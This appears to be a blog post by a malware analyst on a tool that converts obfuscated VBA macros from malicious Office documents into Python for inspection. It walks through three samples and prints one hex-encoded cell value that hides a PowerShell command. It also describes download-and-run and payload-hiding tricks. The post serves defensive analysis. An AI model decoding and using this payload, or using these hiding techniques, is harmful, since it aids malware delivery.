This will probably by the last post about vba2python for a while. This time we’ll walk through 3 samples, look at the output and the various challenges they contain trying to convert this to Python 3.x
Sample 1 – 000475fc6e6705bbc5ebad8cc3af23c6a44b6ab7

Not a complicated sample. You see the Dim statements with a ‘:’ so it also runs a second command. It also uses a class to download a binary through Microsoft.XMLHTTP and Adodb.Stream to write this to disk before it spawns it. It also uses “With” which needs to be supported. The output once it’s done:

Pretty straight forward, sample wasn’t complex to start with and running it in Python just removes a bit of obfuscation.
Sample 2 – e4debf873d683a51626882ba69364b54e5881799
This sample isn’t really difficult, but it contains some element that took time.

You see the Workbook_Open having a “complicated” “Select Case” where it has a bit more omph in the values it reacts to. This is actually not relevant to the sample being malicious, it’s just obfuscation. The magic happens here (the variable m222371a95aa9d8 is actually initialized to 3)

It uses a function rd165a9f386b4b to decrypt the data. Part of of the data is just the object it wants to create and run .Exec from. Part of of the fun is cell-data from the sheet ZAOIQ and Cell G135 (it uses Range, but at one cell) and then extract the value of this cell:
index,name,row,col,value
1,ZAOIQ,6,134,"8281897784857A777E7E40778A77323F897B8076818985868B7E77327A7B76767780323F8081828481787B7E77323F578A777587867B818062817E7B758B3264777F818677657B798077761F1C78878075867B818032804645787877328D1F1C827384737F3A367A73467878743B1F1C368545454873324F32397F4877484376394D1F1C3680764745747378324F3239394D1F1C788184323A367B324F32424D32367B323F7E8632367A7346787874407E778079867A4D32367B3D4F443B328D1F1C368046737445324F326D758180887784866F4C4C6681548B86773A367A7346787874406587748586847B80793A367B3E32443B3E3243483B4D1F1C3680764745747378323D4F326D757A73846F3A368046737445323F748A8184323685454548736D3A367B324132443B323732368545454873407E778079867A6F3B4D1F1C8F1F1C8477868784803236807647457473784D1F1C8F1F1C367949494B43324F3239434A46474275474A4748464645774678434846444746424B4748457448784645464442764245474346474847464A4349434B4745424A434A484543434245464442754774474646734446474A43434745464542744376484742424646464942764277474543484276457548774376464542494773474A424946764747424B4749464443494676474342454278474547424277457448
When you extracted the cell-value you send this to the rd165a9f386b4b function that looks like this:

It basically runs through 2 characters at the time, converts them to int so they can be manipulated and converted back to chr again to be attached to the output string. Not complicated, just hard for a human to read.. To a computer, once this code is converted to Python 3, we simple get the result:

So basically the cell-data decrypted is just a Powershell command, which itself is encrypted. At least you get the context of the macro of what it does, and Powershell is another beast I might challenge later.
Sample 3 – ddcbcf91d98ac04ffbc90ff597bab6263c69eded
This sample also have a lot of obfuscation. It starts with lots of string variables that you might believe contain the encrypted data, but it’s not there.

At some point this KC_U function is invoked and there are two tricks that was challenging.

The first one, ‘GoTo’ doesn’t really exist in Python – but looking around I found a Python package “goto” that I import (one of the reasons to love Python). You need to decorate the using function with @with_goto and create the “goto” and “labels” in the format it expects. One extra challenge here was that the sample jumps back and forth a bit, and at label x3 it exits the sub. Unfortunately the goto library could not see past that element, so the x2 label couldn’t be reached. The solution was then to automagically rewrite this section to this when it creates the Python code:

So if the code wants to return from the subroutine in a goto scenario to code beyond “return” – you add another label at the end and simply replace the “return” to “goto .exitatlast”.
The second trick this plays, which is harder to understand at the moment is finding the data it decrypts. All the data you see in the document are garbage. As you can see, it reads the Cell (1,1) value – but it wants the text of the Comment. The TxO record in the Workbook stream looks like this and contain the encrypted data:

with a lot more data following. Other records that build up to this are these:

Current thinking is that cell (1,1) is an image, as the Obj record has a 0x19 (Note) and this is followed by a MsoDrawing record which again TxO needs to follow.
When this runs as Python code, the results looks like this:

Again we see it just launch a Powershell script, but in this case it’s not encrypted. The tool provides good context of what the document is up to.
I think this will be my last post on vba2python as it’s starting to look good and behave as I expect it to. I’ll probably rewrite it a few times to enhance it and work on more samples too to make sure it handles what’s needed for a real world gateway to do this kind of inspection. Then it’s time to find a new task.